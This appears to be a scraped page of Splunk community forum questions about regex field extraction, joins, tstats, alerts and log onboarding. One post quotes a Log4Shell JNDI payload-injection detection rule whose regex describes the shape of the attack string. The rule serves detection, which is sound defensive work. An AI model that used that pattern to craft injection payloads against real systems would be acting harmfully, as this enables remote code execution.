All Topics


I have the raw event below:

03 Mar 2022 10:08:18,188 GMT ERROR [dbdiNotificationService,ServiceManagement] {} - Caught Runtime exception at service dbdiNotificationService java.lang.IllegalArgumentException: No enum constant com.db.fx4capi.Fx4cApiLocal.TradeProcessingStatus.TRADE_STATUS_CANCELLED at java.lang.Enum.valueOf(Enum.java:238) ~[?:1.8.0_311] at com.db.fx4capi.Fx4cApiLocal$TradeProcessingStatus.valueOf(Fx4cApiLocal.java:10) ~[trade-22.1.1-8.jar:?] at com.db.fx4cash.trade.step.GetTradeReferenceAndStatusStep.step(GetTradeReferenceAndStatusStep.java:24) ~[step-22.1.1-8.jar:?] at com.db.servicemanagement.TransactionDispatchService.executeIteration(TransactionDispatchService.java:275) [servicemanagement-22.1.1-8.jar:?] at com.db.servicemanagement.TransactionDispatchService.startDispatch(TransactionDispatchService.java:673) [servicemanagement-22.1.1-8.jar:?] at com.db.servicemanagement.TransactionDispatchService.run(TransactionDispatchService.java:91) [servicemanagement-22.1.1-8.jar:?] at com.db.servicemanagement.ServiceThread.run(ServiceThread.java:36) [servicemanagement-22.1.1-8.jar:?] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_311]

I would like to capture the part marked in bold (the whole error message, including the stack trace). I am using the command below but only getting partial output:

index=app_events_fx4cash_uk_prod source=*STPManager-servicemanagement.20220303-100818.log* | rex field=_raw "^[^\-\n]*\-\s+(?P<Error>.+)" | table Error

My output is only "Caught Runtime exception at service dbdiNotificationService", but my requirement is to capture the whole error marked in bold.
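A minimal sketch of the regex idea in Python, on a shortened copy of the event (the `{} -` anchor is an assumption about where the message starts): in most regex flavors, including the PCRE used by rex, `.` does not match newlines unless single-line mode `(?s)` is set, which would explain a capture stopping before the stack trace.

```python
import re

# Shortened version of the raw event; the real one continues with more
# "at ..." stack-trace lines.
event = (
    "03 Mar 2022 10:08:18,188 GMT ERROR "
    "[dbdiNotificationService,ServiceManagement] {} - "
    "Caught Runtime exception at service dbdiNotificationService "
    "java.lang.IllegalArgumentException: No enum constant\n"
    "at java.lang.Enum.valueOf(Enum.java:238) ~[?:1.8.0_311]"
)

# (?s) lets "." cross line breaks, so the capture runs to the end of the
# event instead of stopping at the first newline.
match = re.search(r"(?s)\{\}\s*-\s*(?P<Error>.+)", event)
print(match.group("Error"))
```

In SPL the equivalent change would be prefixing the rex pattern with (?s) so the Error group spans the whole multi-line trace.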
Hi all, I am ingesting Cisco FTD logs and currently using the Cisco ASA add-on, which works fine for a lot of event messages. Unfortunately, it is not working perfectly, as there is one event message that is not recognized by the add-on. Which Splunk-supported method is best for a standardized onboarding with full CIM knowledge? I do not want to use eStreamer, as it mostly creates issues and is not Splunk-supported. Currently used: "Splunk_TA_cisco-asa-4.2.0"

Best, O.
Can someone help me with a regex to get the Security ID value (in bold) under Target Account? Below is a sample.

*** Event in text form ***

03/23/2022 03:20:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4738
EventType=0
Type=Information
ComputerName=FRDPLIDC1.emea.loreal.intra
TaskCategory=User Account Management
OpCode=Info
RecordNumber=386009504
Keywords=Audit Success
Message=A user account was changed.

Subject:
    Security ID: EMEA\romain.pruneaux-adm
    Account Name: romain.pruneaux-adm
    Account Domain: EMEA
    Logon ID: 0x31BBDCF0

Target Account:
    Security ID: EMEA\frclichyloftvcL05.01
    Account Name: frclichyloftvcL05.01
    Account Domain: EMEA
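A sketch of the idea in Python on a trimmed copy of the event: anchor on "Target Account:" first, then capture the next Security ID, so the Subject's Security ID is skipped.

```python
import re

# Trimmed copy of the Windows 4738 event body.
event = """A user account was changed.
Subject:
    Security ID: EMEA\\romain.pruneaux-adm
    Account Name: romain.pruneaux-adm
Target Account:
    Security ID: EMEA\\frclichyloftvcL05.01
    Account Name: frclichyloftvcL05.01
"""

# (?s) lets ".*?" cross line breaks between the anchor and the value.
match = re.search(r"(?s)Target Account:.*?Security ID:\s*(?P<SecurityID>\S+)", event)
print(match.group("SecurityID"))  # EMEA\frclichyloftvcL05.01
```

The same pattern should work in rex, since the named-group syntax is shared.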
Hi, I am using the query below to bring the output into a graph dashboard, but it returns the same Disk and Memory values for every row. I have attached the output as well. Can anyone help me?

Query:
index=oswin sourcetype="Perfmon:Processor" host=COPYCAR01 | timechart avg(cpu_load_percent) as CPU span=15min | join type=left host [| mstats avg("Memory.%_Committed_Bytes_In_Use") as Memory WHERE index=oswinperf AND host=COPYCAR01 span=15min ] | join type=left host [| mstats avg("LogicalDisk.%_Free_Space") as Diskfree WHERE index=oswinperf AND host=COPYCAR01 span=15min | eval DISK=100 - Diskfree | table _time,DISK]

Output:
_time                 CPU                 DISK                Memory
2022-03-24 09:00:00   55.78524325650826   57.29944034187627   11.84846114177454
2022-03-24 09:15:00   59.38775699798989   57.29944034187627   11.84846114177454
2022-03-24 09:30:00   56.71582822628451   57.29944034187627   11.84846114177454
I am searching as below, but my join operation is not bringing back results from the join for a couple of imei values/records. I have 100 different imei numbers, but 10 of them are not returning any results.

index="etl_pipeline_data" environment=prd source=meta_data origin IN (device_properties, gsm_info,backend_transaction) |fields _time,tenant,origin,imei,timestamp, timestamp_device,tz_offset_cest |eval ts_device_epoch=strptime(timestamp_device,"%Y-%m-%dT%H:%M:%S.%3N")| eval ts_device=ts_device_epoch+tz_offset_cest |eval eventdate=strftime(ts_device,"%Y-%m-%d") |stats latest by tenant,origin,imei,ts_device |rename latest(*) as * |stats values(*) by tenant, imei, eventdate |join type=left imei [|loadjob savedsearch="xx:yyy:DEVICE_TRAINPASS_Report_db" ] | where imei = 352369082111082 | table imei, eventdate,train2s

As proof, in the second search I checked the data type; there are no issues with that. I also tried the method below instead of join, but it is not returning any records either.

index="etl_pipeline_data" environment=prd source=meta_data origin IN (device_properties, gsm_info,backend_transaction) |fields _time,tenant,origin,imei,timestamp, timestamp_device,tz_offset_cest |eval ts_device_epoch=strptime(timestamp_device,"%Y-%m-%dT%H:%M:%S.%3N")| eval ts_device=ts_device_epoch+tz_offset_cest |eval eventdate=strftime(ts_device,"%Y-%m-%d") |stats latest by tenant,origin,imei,ts_device |rename latest(*) as * |stats values(*) by tenant, imei, eventdate |table imei,eventdate |append [|loadjob savedsearch="xx:yyyy:DEVICE_TRAINPASS_Report_db" | fields imei,eventdate,trains ] | where imei = 352369082111082

Is there any limitation in Splunk? Could you please help me to achieve this merge operation?
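One thing worth checking (an assumption based on the symptoms, not something confirmed by the post): if imei is a string on one side and a number on the other, an equality filter or join key can silently match nothing. Splunk's join can also truncate subsearches that exceed its result limits, which would drop some values. A tiny Python illustration of the type-mismatch effect, with made-up variable names:

```python
# Hypothetical values illustrating a type mismatch on a join key: the digits
# are identical, but one side is a string and the other is an integer.
imei_from_logs = "352369082111082"    # field extracted from events: string
imei_from_report = 352369082111082    # value loaded from the saved report: integer

print(imei_from_logs == imei_from_report)        # False: types differ
print(str(imei_from_report) == imei_from_logs)   # True: normalized first
```

In SPL terms, normalizing both sides with something like tostring() before the join is the analogous fix.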
Hi Splunkers, as part of my tasks I examined some existing Splunk searches, and one of them concerns a Log4j vulnerability. In particular, I encountered the rule "ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", which has the following code:

| from datamodel Web.Web | regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`

I noted the use of the _raw field and that, even though a datamodel is used, the tstats command is avoided and a normal stats is used instead. So I tried to translate it into a search that uses tstats, something like this:

| tstats summariesonly=true fillnull_value="N/D" count from datamodel=Web by Web.log_region, Web.log_country, index, host, Web.src, Web.dest _raw | `drop_dm_object_name("Web")` | regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"

and I got no results. I then removed the regex filter and noted that, when the search runs, the _raw field is filled with the "N/D" value. Does this mean that _raw cannot be used with tstats?
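As an aside, the detection regex itself can be exercised outside Splunk; a small Python sketch with made-up sample requests shows what it catches (plain and URL-encoded JNDI payloads) and what it ignores:

```python
import re

# The regex from the ESCU rule, verbatim.
jndi_pattern = re.compile(
    r"[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
)

samples = [
    "GET /index.jsp?x=${jndi:ldap://evil.example/a}",                   # classic probe
    "GET /index.jsp?x=%24%7Bjndi%3Aldap%3A%2F%2Fevil.example%2Fa%7D",   # URL-encoded
    "GET /index.jsp?x=hello",                                           # benign
]
results = [bool(jndi_pattern.search(s)) for s in samples]
print(results)  # [True, True, False]
```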
I would like to generate an alert if there are no events for the destinations in my list for the last 30 minutes. I have tried the query below, but it does not work.

Index=_firewall sourcetype="f5:bigip:asm:syslog" dest_ip="10.10.10.20" earliest= -30m latest=now | stats count by dest_ip,Service | eval count=if (count <=20,0,0)
Hello, I have a scheduled report which is used to fill a summary index. The report for the summary index is scheduled hourly (based on index time). The event data is usually indexed once per day (though sometimes there are multiple data ingestions from the server per day).

The thing is that the search is inefficient. In normal cases this is no issue, but when a day was skipped for ingestion and the next day therefore indexes two days of event data at once, the report for the summary index will crash and there will be a gap in the summary index. To avoid data gaps, I configured the search to be durable.

This is the configuration regarding the time constraints of the search:

This is the configuration for the durable search (the backfill method is "multiple", as recommended for searches with transforming commands):

To test whether data gaps in the summary index are recovered automatically, I stopped the dataflow for the event index for 5 days and then indexed all the data at once, knowing that this would lead the scheduled report to crash. Unfortunately, the durable search did not recover the data gap in the summary index. Of the 5 days, only a few hours were indexed into the summary index. Does someone have an idea why this is so? Thanks and best regards
I have the system column "_time" with the output below:

2022-03-16 11:12:18.723

I would like to segregate date and time with the rex command. The output should look like this, with new column names:

Date = 2022-03-16
Time = 11:12:18
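The split itself is a simple two-group regex; here is a minimal Python sketch (note that in Splunk, _time is stored as epoch time, so in SPL you would typically format it to a string first, e.g. with strftime, before applying rex; the pattern below assumes the YYYY-MM-DD HH:MM:SS.mmm string shown):

```python
import re

time_value = "2022-03-16 11:12:18.723"

# One named group per part; the fractional seconds are deliberately left
# out of Time, matching the desired output.
match = re.match(r"(?P<Date>\d{4}-\d{2}-\d{2})\s+(?P<Time>\d{2}:\d{2}:\d{2})", time_value)
print(match.group("Date"), match.group("Time"))  # 2022-03-16 11:12:18
```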
Hello, I use a complex search that displays results ordered by time in a table. As you can see, the time period is today between 7h and 19h.

| appendcols [ search `index` type=* earliest=@d+7h latest=@d+19h | search web_domain=sharepoint.com | search web_duration_ms > 7000 | stats count as PbPerf by sam _time | timechart span=1h dc(sam) as "SHAREPOINT - Nb d'utilisateurs ayant un temps de réponse > 7 sec" ] | appendcols [ search `index` type=* earliest=@d+7h latest=@d+19h | search web_domain=laposte.sharepoint.com | timechart span=1h count as "SHAREPOINT - Nb d'erreurs" ] | where _time <now() | eval time=strftime(_time,"%H:%M") | sort time | fields - _time _span _origtime | transpose 0 header_field=time column_name=KPI | fillnull value=0 | sort + KPI

The results are displayed like this. In the KPI field, I have 10 different items. The problem is that when I run the dashboard at 7h, only one or two items are displayed, with no results in the 7h span, and moreover the column corresponding to 7h is not displayed. Items start to be displayed only once there is a result > 0, and in that case the "7h" column is displayed correctly.

What I need: when I launch the dashboard at 7h, and even while the time is earlier than 8h, all the items in the KPI column should be displayed, and the "7h" column too, with results = 0 if there are no results, or of course with the results if there are any. Could you help me with this complex need, please?
Hi, I would like to get the average of multiple fields in the same row, but not all of them; would anyone be able to advise on this?

query | chart latest(time_taken) by process server

# Results
Process  Local-1  Local-2  Avg(Local)  Remote-1  Remote-2
A        1        2        1.5         2         2
B        1        3        2           3         3

I would like to add an Avg(Local) field which gives me the average time taken by the processes running on Local-1 and Local-2. Appreciate any suggestions, thanks!
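The desired calculation is just a row-wise average over a subset of columns; a small Python sketch of that logic (toy rows mirroring the chart output; in SPL this would typically be an eval over the specific columns):

```python
# Toy rows mirroring the chart output; compute a row-wise average over
# just the Local-* columns, leaving the Remote-* columns out.
rows = [
    {"Process": "A", "Local-1": 1, "Local-2": 2, "Remote-1": 2, "Remote-2": 2},
    {"Process": "B", "Local-1": 1, "Local-2": 3, "Remote-1": 3, "Remote-2": 3},
]

for row in rows:
    local_values = [v for k, v in row.items() if k.startswith("Local-")]
    row["Avg(Local)"] = sum(local_values) / len(local_values)

print([r["Avg(Local)"] for r in rows])  # [1.5, 2.0]
```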
I have a list of items plotted in a line graph, which is basically time-series data. I would like an option to select one or multiple items from that list and see the graph.

For example, the graph below has two items listed in a time-series graph. How can I view only one item, or several selected items, when there are more items? Can I add a search for the list of items on the right, along with the list?
How do I display an authentication error in Python for a Splunk connection?
How do I display a oneshot search's ResponseReader object?
Hi all, I was trying to generate more than 10,000 results from my search, and it displayed a message saying the results are being truncated. Is there any way to change the limit for my column chart in the XML file? I don't have permission to change the visualization.conf file, so I am asking whether there is a way to change it through the XML source.
Hi all, I need help with the query below. I have a set of application logs, all in text format, which are generated every day. I need to send all those logs to Splunk with proper field extraction. Please assist.
Hi, I am trying to use the case keyword to solve a multiple nested statement, but it only gives me the output for the else value; it seems like it is not going into any other statement to check. Could anyone please help me here? I tried using multiple if statements with eval and still had the same issue.

Problem statement: I want to compare the values of status-fail and status-success and, on that basis, generate the output:

case 1: if status-fail = 0 and status-success > 0 ---> successful logins
case 2: if status-fail > 0 and status-success > 0 ---> multi-successful logins
case 3: if status-fail > 0 and status-success = 0 ---> multi-fail
case 4: if status-fail > 0 ---> fail logins

Below is the query I am using:

table hqid, httpStatus | eval status-success=if(httpStatus="200",1,0) | eval status-fail= if(httpStatus != "200",1,0) | stats sum(status-success) as status-success, sum(status-fail) as status-fail by hqid | eval status = case(status-fail = 0 AND status-success > 0, "successful-logins", status-fail > 0 AND status-success > 0, "multi-success", status-fail > 0 AND status-success=0, "multi-fail", status-fail > 0, "fail",1=1,"Others")
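One pitfall worth checking (an educated guess, not confirmed from the post): in eval, a hyphenated field name like status-fail can be parsed as the arithmetic expression "status minus fail" unless it is wrapped in single quotes ('status-fail'). Independently of that, the intended branching can be sketched in Python to verify the logic itself:

```python
def classify(status_fail, status_success):
    """Mirror of the intended case() cascade; case() returns the first
    condition that matches, top to bottom, so ordering matters."""
    if status_fail == 0 and status_success > 0:
        return "successful-logins"
    if status_fail > 0 and status_success > 0:
        return "multi-success"
    if status_fail > 0 and status_success == 0:
        return "multi-fail"
    if status_fail > 0:
        # Unreachable for non-negative counts: the two branches above
        # already cover every status_fail > 0 case.
        return "fail"
    return "Others"

print(classify(0, 3), classify(2, 3), classify(2, 0), classify(0, 0))
# successful-logins multi-success multi-fail Others
```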
Gentlemen, we are ingesting Windows Sysmon logs via TA-microsoft-sysmon, and the raw events are showing in XML format. There are a couple of fields that did not get extracted, and even with IFX, the accuracy of extracting these two fields isn't 100%. Below is one of the XML elements from my raw event. Can someone please assist me with a regex for extracting technique_id and technique_name? As you can see, these two are embedded within the "RuleName" tag.

<Data Name='RuleName'>technique_id=T1055.001,technique_name=Dynamic-link Library</Data>

I have tried on regex101.com but can't get my capture group to extract these two values. At the end of the day, I want two fields, technique_id (with value T1055.001) and technique_name (with value "Dynamic-link Library"), to show up under "Interesting fields". Thank you in advance.
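A sketch of a regex that handles this sample (assuming the RuleName value always has the id first and the name second, which is an assumption from the single example):

```python
import re

raw = ("<Data Name='RuleName'>technique_id=T1055.001,"
       "technique_name=Dynamic-link Library</Data>")

# technique_id stops at the comma; technique_name runs to the closing tag.
pattern = (r"technique_id=(?P<technique_id>[^,<]+),"
           r"technique_name=(?P<technique_name>[^<]+)")
match = re.search(pattern, raw)
print(match.group("technique_id"))    # T1055.001
print(match.group("technique_name"))  # Dynamic-link Library
```

The same pattern dropped into rex should produce both fields, since rex uses the same named-group syntax.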
From the log below:

aoauwersdfx01a-mgt.example.com NewDecom: Info: 164807335647.901 0 10.200.111.06 NONE/504 0 GET http://wpad.example.com/wpad.dat - NONE/wpad.example.com

I need to extract the fields:

Field 1: result=NONE/504, changed to status=504
Field 2: url=http://wpad.example.com/wpad.dat, changed to url=wpad.example.com

I need the regular expression for this.
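A sketch of the extraction in Python regex terms (assuming the result code always appears before the URL, as in the sample; the capture names mirror the requested field names):

```python
import re

log = ("aoauwersdfx01a-mgt.example.com NewDecom: Info: 164807335647.901 0 "
       "10.200.111.06 NONE/504 0 GET http://wpad.example.com/wpad.dat - "
       "NONE/wpad.example.com")

# status: the digits after the slash in the first NONE/<code> token.
# url: the host portion of the request URL, without scheme or path.
match = re.search(r"\bNONE/(?P<status>\d{3})\b.*?\bhttps?://(?P<url>[^/\s]+)", log)
print(match.group("status"), match.group("url"))  # 504 wpad.example.com
```

The literal NONE is taken from this one sample; if other result strings can occur, a more general form such as \w+/(?P<status>\d{3}) may be needed.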
I have a device reporting to Splunk through syslog. The traffic from that device first goes through an F5, and the F5 delivers it to my heavy forwarders. The problem is that the year in the timestamp is out of date: the date when a server event is generated is 2022, but in the search head I see it as 2017. I don't know whether the problem is on the origin server at the syslog protocol level, in the transport layer, or at the collection level within Splunk. This issue only occurs on 3 machines out of 10. I have reviewed the props settings, but since I don't see the year in the source data, I can hardly modify the timestamp. Regards